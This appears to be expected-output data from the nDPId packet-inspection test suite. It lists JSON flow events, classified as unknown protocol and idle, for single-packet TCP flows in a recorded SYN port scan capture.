-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1010,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1990,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 